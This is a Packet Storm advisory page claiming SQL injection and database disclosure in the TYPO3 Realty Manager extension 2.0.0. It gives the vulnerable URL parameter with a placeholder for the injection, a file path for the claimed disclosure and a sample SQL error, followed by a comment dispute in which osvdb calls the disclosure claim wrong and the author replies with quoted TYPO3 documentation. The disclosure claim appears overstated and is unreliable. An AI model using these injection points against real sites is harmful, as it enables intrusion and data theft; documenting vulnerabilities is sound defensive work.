exploit the possibilities

Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 Database Disclosure / SQL Injection

Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 Database Disclosure / SQL Injection
Posted Feb 19, 2019
Authored by KingSkrupellos

Typo3 CMS Realty Manager tx_realty_pi1 version 2.0.0 suffers from database disclosure and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure
MD5 | 5d7dec2aefebceae6a65631a827f8e8b

Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 Database Disclosure / SQL Injection

Change Mirror Download
############################################################################################

# Exploit Title : Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/02/2019
# Vendor Homepage : typo3.org ~ oliverklee.de
# Software Download Link : github.com/TYPO3-svn-archive/realty/archive/master.zip
extensions.typo3.org/extension/download/realty/2.0.0/zip/
# Software Information Link : extensions.typo3.org/extension/realty/
github.com/TYPO3-svn-archive/realty
# Software Version : From 0.1.0 - 0.5.3 to 2.0.0 / All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Description about Software :
***************************
Provides a plugin that displays realty objects (properties, real estate),

including an image gallery for each object.

############################################################################################

# Impact :
***********
* Typo3 Realty Manager tx_realty_pi1 2.0.0 [ and other versions ]

extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize

user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,

access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser.

* On the other hand, this Software prone to an information exposure/database disclosure vulnerability.

Successful exploits of this issue may allow an attacker to obtain sensitive

information by downloading the full contents of the application's database.

* Any remote user may download the database files and gain access

to sensitive information including unencrypted authentication credentials.

############################################################################################

# SQL Injection Exploit :
***********************

/index.php?id=[ID-NUMBER]&tx_realty_pi1%5Bcity%5D=[ID-NUMBER]&tx_realty_pi1%5Bdistrict%5D=[ID-NUMBER]&tx_realty_pi1%5BorderBy%5D=[SQL Injection]

# Database Disclosure Exploit :
***************************

/typo3conf/ext/realty/ext_table.sql

############################################################################################

# Example SQL Database Error :
****************************
You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near 'LIMIT 0,1' at line 1

The last built query
*****************
SELECT COUNT(*) AS oelib_counter FROM tx_realty_objects
INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid
WHERE 1=1 AND tx_realty_objects.deleted=0 AND tx_realty_objects.t3ver_state
<=0 AND tx_realty_objects.pid<>-1 AND tx_realty_objects.hidden=0 AND
tx_realty_objects.starttime<=1550508420 AND (tx_realty_objects.endtime=0 OR
tx_realty_objects.endtime>1550508420) AND tx_realty_cities.deleted=0 AND
house_type = 2 AND tx_realty_objects.city = 1 AND tx_realty_objects.project_id = LIMIT 0,1

#0 /home/jail/home/buecher/htdocs/typo3conf/ext/oelib/class.tx_oelib_db.php(394):
tx_oelib_db::select('COUNT(*) AS oel...', 'tx_realty_objec...', '1=1 AND tx_real...', '', '', '0,1')

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################

Comments (2)

RSS Feed Subscribe to this comment feed
osvdb

# Database Disclosure Exploit :

Negative. ext_table.sql is part of the distribution and used to set up a database:

#
# Table structure for table 'tx_realty_objects'
#
CREATE TABLE tx_realty_objects (
uid int(11) unsigned NOT NULL auto_increment,
pid int(11) DEFAULT '0' NOT NULL,
tstamp int(11) DEFAULT '0' NOT NULL,

This is not disclosing the database on the target system. This is one of many so-called database disclosures from KingSkrupellos that are wrong.

Comment by osvdb
2019-02-20 22:44:55 UTC | Permalink | Reply
kingskrupellos

Dear osvdb ;

It is not wrong. Everything is correct [ true ] about ext_tables.sql and its database topic.
Because ; For example =>
Each extension in TYPO3 CMS can bring the file ext_tables.sql that defines which tables and fields the extension needs.
Gathering all ext_tables.sql thus defines the full set of tables, fields and indexes of a TYPO3 instance to unfold its full feature set.
Preparing the database =>
The preparation of the database primarily covers the creation of the database tables.
The commands for the creation are done in SQL. The code is put into the file ext_tables.sql which itself is located on the top level of the extension directory.
Preparing the tables of the Domain Objects
Let's have a look at the definition of the database table which will aggregate the objects of the class \MyVendor\SjrOffers\Domain\Model\Organization:
ext_tables.sql
CREATE TABLE tx_sjroffers_domain_model_organization (
uid int(11) unsigned DEFAULT 0 NOT NULL auto_increment,
pid int(11) DEFAULT 0 NOT NULL,

name varchar(255) NOT NULL,
address text NOT NULL,
telephone_number varchar(80) NOT NULL,
telefax_number varchar(80) NOT NULL,
url varchar(80) NOT NULL,
email_address varchar(80) NOT NULL,
description text NOT NULL,
image varchar(255) NOT NULL,
contacts int(11) NOT NULL,
offers int(11) NOT NULL,
administrator int(11) NOT NULL,

tstamp int(11) unsigned DEFAULT 0 NOT NULL,
crdate int(11) unsigned DEFAULT 0 NOT NULL,
deleted tinyint(4) unsigned DEFAULT 0 NOT NULL,
hidden tinyint(4) unsigned DEFAULT 0 NOT NULL,
sys_language_uid int(11) DEFAULT 0 NOT NULL,
l18n_parent int(11) DEFAULT 0 NOT NULL,
l18n_diffsource mediumblob NOT NULL,
access_group int(11) DEFAULT 0 NOT NULL,

PRIMARY KEY (uid),
KEY parent (pid),
);
CREATE TABLE instructs the database to create a new table named tx_sjroffers_domain_model_organization. The table's name is derived from the Extbase convention which describes that class names are written in lowercase retaining the underlines.
Note
The file ext_tables.sql is executed whenever the extension is installed. Nevertheless, TYPO3 is smart enough not to overwrite an existing database table. On the contrary it deduces the differences between the new and the existing table and just adds those additional information.
This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
This file should contain a table structure dump of the tables used by the extension.
It is used for evaluation of the database structure and is therefore important to check and update the database
when an extension is enabled. If you add additional fields (or depend on certain fields) to existing tables,
you can also put them here. In that case, insert a CREATE TABLE structure for that table,
but remove all lines except the ones defining the fields you need. The ext_tables.sql file may
not necessarily be dumpable directly to MySQL (because of the semi-complete table definitions
allowed defining only required fields.). But the EM or Install Tool can handle this.
The only very important thing is that the syntax of the content is exactly like MySQL
made it so that the parsing and analysis routines of the EM don't get confused.
About The ext_tables.sql files =>
As mentioned before, all data definition statements are stored in files called ext_tables.sql which may be present in any extension.
The peculiarity is that these files may not always contain a complete and valid SQL data definition. For example, system extension "rsaauth" defines a new table for storing RSA keys:

CREATE TABLE tx_rsaauth_keys (
uid int(11) NOT NULL auto_increment,
pid int(11) DEFAULT '0' NOT NULL,
crdate int(11) DEFAULT '0' NOT NULL,
key_value text,

PRIMARY KEY (uid),
KEY crdate (crdate)
);
This is a complete and valid SQL data definition. However system extension "css_styled_content" extends the "tt_content" table with additional fields. It also provides these changes in the form of a SQL CREATE TABLE statement:

CREATE TABLE tt_content (
header_position varchar(6) DEFAULT '' NOT NULL,
image_compression tinyint(3) unsigned DEFAULT '0' NOT NULL,
image_effects tinyint(3) unsigned DEFAULT '0' NOT NULL,
image_noRows tinyint(3) unsigned DEFAULT '0' NOT NULL,
section_frame int(11) unsigned DEFAULT '0' NOT NULL,
spaceAfter smallint(5) unsigned DEFAULT '0' NOT NULL,
spaceBefore smallint(5) unsigned DEFAULT '0' NOT NULL,
table_bgColor int(11) unsigned DEFAULT '0' NOT NULL,
table_border tinyint(3) unsigned DEFAULT '0' NOT NULL,
table_cellpadding tinyint(3) unsigned DEFAULT '0' NOT NULL,
table_cellspacing tinyint(3) unsigned DEFAULT '0' NOT NULL
);
The classes which take care of assembling the complete SQL data definition will compile all the CREATE TABLE statements for a given table and turn it into a single CREATE TABLE statement. If the table already exists, missing fields are isolated and ALTER TABLE statements are proposed instead.
What this means is that - as an extension developer - you should always have only CREATE TABLE statements in your ext_tables.sql files, the system will handle them as needed.
If you don't believe - you can check here - No - they are true - you are wrong osvdb. This is the reality.
docs.typo3.org/typo3cms/CoreApiReference/ApiOverview/Database/DatabaseUpgrade/Index.html
docs.typo3.org/typo3cms/ExtbaseFluidBook/6-Persistence/1-prepare-the-database.html

Comment by kingskrupellos
2019-02-21 00:18:41 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close